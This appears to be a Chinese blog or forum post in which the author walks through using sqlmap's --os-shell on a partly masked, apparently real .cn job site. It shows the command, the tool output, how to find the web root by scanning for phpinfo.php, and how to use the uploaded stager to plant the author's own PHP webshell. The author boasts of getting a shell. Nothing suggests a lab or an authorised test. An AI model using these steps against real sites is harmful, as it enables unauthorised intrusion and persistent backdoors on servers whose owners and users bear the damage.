借鉴 http://www.2cto.com/Article/201206/138091.html
俺稍微改了一下 - = 凑合着用 反正我特么的拿到shell了.
记录开始.
sqlmap.py -u "http://www.****.cn/job/index.php?key=1" --os-shell
[14:39:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, PHP 5.2.9
back-end DBMS: MySQL 5.0
[14:39:11] [INFO] going to use a web backdoor for command prompt
[14:39:11] [INFO] fingerprinting the back-end DBMS operating system
[14:39:12] [INFO] the back-end DBMS operating system is Windows
[14:39:12] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
>
当然 这个是php的站 我们选择3 PHP (default)
[14:42:09] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot
/]:
不知道路径咋办呢 - - 用扫描器扫扫目录底下的phpinfo.php或者别的文件名 看下路径
得到路径之后填写到刚跳出来的那个里面
[14:42:09] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot
/]:E:/Web/ygbh
然后回车之后又跳几行 就是让你选择上传在哪个目录 我们就直接回车 不管它 默认空着就好
[14:44:35] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [E
nter for None]:
接下来回车之后 sqlmap变成这样
[14:45:53] [INFO] the file stager has been successfully uploaded on 'E:/Web/ygbh
' ('http://www.****.cn:80/tmpuodot.php')
[14:45:53] [INFO] the backdoor has probably been successfully uploaded on 'E:/We
b/ygbh', go with your browser to 'http://www.****.cn:80//tmpbcmnd.php' and enjoy
it!
[14:45:53] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
- - tmpuodot.php tmpbcmnd.php 你会发现有俩文件!! 是两个文件!!九区那个估计是看走眼了
一个是上传的文件! 一个是执行cmd的文件!是俩文件!
打开http://www.****.cn/tmpuodot.php 上传我们自己的php马 - = 另外一个不管它
完!